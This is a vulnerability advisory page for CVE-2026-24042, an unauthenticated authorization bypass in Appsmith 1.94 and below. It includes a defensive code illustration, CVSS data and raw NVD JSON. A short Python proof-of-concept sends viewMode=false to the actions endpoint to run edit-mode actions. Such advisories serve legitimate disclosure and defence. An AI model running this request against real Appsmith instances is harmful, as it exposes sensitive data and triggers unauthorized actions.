Security Vulnerability Report
CVE-2026-24042 CVSS 9.4 CRITICAL

CVE-2026-24042

Published: 2026-01-22 04:16:00
Last Modified: 2026-02-17 17:50:45

Description

Appsmith is a platform to build admin panels, internal tools, and dashboards. In versions 1.94 and below, publicly accessible apps allow unauthenticated users to execute unpublished (edit-mode) actions by sending viewMode=false (or omitting it) to POST /api/v1/actions/execute. This bypasses the expected publish boundary where public viewers should only execute published actions, not edit-mode versions. An attack can result in sensitive data exposure, execution of edit‑mode queries and APIs, development data access, and the ability to trigger side effect behavior. This issue does not have a released fix at the time of publication.
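To make the missing check concrete, here is an added illustration (not Appsmith's own code; Principal, ActionStore and the resolve_action_* functions are hypothetical names) that models a server trusting the client's viewMode beside one that derives the mode from the caller's rights, which is the publish boundary the advisory describes:

```python
from dataclasses import dataclass
from typing import Optional

# Constructed model of the publish boundary described in the advisory.
# Principal, ActionStore and resolve_action_* are hypothetical names,
# not Appsmith's own API.

@dataclass(frozen=True)
class Principal:
    user_id: Optional[str]    # None for an anonymous public viewer
    can_edit: bool = False    # True only for users allowed to edit the app


class ActionStore:
    """Keeps a published and an unpublished (edit-mode) body per action id."""

    def __init__(self):
        self._published = {}
        self._unpublished = {}

    def put(self, action_id, published_body, unpublished_body):
        self._published[action_id] = published_body
        self._unpublished[action_id] = unpublished_body

    def get(self, action_id, view_mode):
        table = self._published if view_mode else self._unpublished
        return table[action_id]


def resolve_action_weak(store, principal, action_id, request_view_mode):
    """Weak: the client's viewMode decides which body runs, and an omitted
    flag defaults to edit mode. The principal is never consulted, so an
    anonymous viewer sending viewMode=false (or nothing) gets the
    unpublished body."""
    view_mode = False if request_view_mode is None else bool(request_view_mode)
    return store.get(action_id, view_mode)


def resolve_action_hardened(store, principal, action_id, request_view_mode):
    """Hardened: viewMode is derived from the principal. Anyone without edit
    rights is pinned to the published body; only editors may opt into the
    edit-mode body, and an omitted flag fails closed to published."""
    if principal.user_id is None or not principal.can_edit:
        view_mode = True
    else:
        view_mode = True if request_view_mode is None else bool(request_view_mode)
    return store.get(action_id, view_mode)
```

The same principle applies to any mode or environment flag a client can send: treat it as a preference that authorization may honour, never as the authorization decision itself.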

CVSS Details

CVSS Score: 9.4
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:appsmith:appsmith:*:*:*:*:*:*:*:* - VULNERABLE
Appsmith <= 1.94

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target Appsmith instance
target_url = "http://target-appsmith.com/api/v1/actions/execute"

# Build the request that bypasses the viewMode check
payload = {
    "actionId": "<action_id>",
    "viewMode": False  # Key: set to False to reach the edit-mode action
}
headers = {
    "Content-Type": "application/json"
}

# Send the unauthenticated request
response = requests.post(target_url, json=payload, headers=headers)
print(f"Status Code: {response.status_code}")
print(f"Response: {response.text}")
```

References

https://github.com/appsmithorg/appsmith/security/advisories/GHSA-j9qq-4fj9-9883 (Third Party Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-24042",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-22T04:16:00.187",
    "lastModified": "2026-02-17T17:50:44.837",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Appsmith is a platform to build admin panels, internal tools, and dashboards. In versions 1.94 and below, publicly accessible apps allow unauthenticated users to execute unpublished (edit-mode) actions by sending viewMode=false (or omitting it) to POST /api/v1/actions/execute. This bypasses the expected publish boundary where public viewers should only execute published actions, not edit-mode versions. An attack can result in sensitive data exposure, execution of edit‑mode queries and APIs, development data access, and the ability to trigger side effect behavior. This issue does not have a released fix at the time of publication."
      },
      {
        "lang": "es",
        "value": "Appsmith es una plataforma para construir paneles de administración, herramientas internas y paneles de control. En las versiones 1.94 e inferiores, las aplicaciones de acceso público permiten a usuarios no autenticados ejecutar acciones no publicadas (en modo edición) enviando viewMode=false (o omitiéndolo) a POST /API/v1/actions/execute. Esto elude el límite de publicación esperado donde los espectadores públicos solo deberían ejecutar acciones publicadas, no versiones en modo edición. Un ataque puede resultar en exposición de datos sensibles, ejecución de consultas y API en modo edición, acceso a datos de desarrollo y la capacidad de desencadenar comportamientos con efectos secundarios. Este problema no tiene una solución publicada en el momento de la publicación."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L",
            "baseScore": 9.4,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.5
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-862"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:appsmith:appsmith:*:*:*:*:*:*:*:*",
                "versionEndIncluding": "1.94",
                "matchCriteriaId": "E0D385D9-E0EC-4CED-AB28-87B2CD03C5E8"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/appsmithorg/appsmith/security/advisories/GHSA-j9qq-4fj9-9883",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      }
    ]
  }
}
```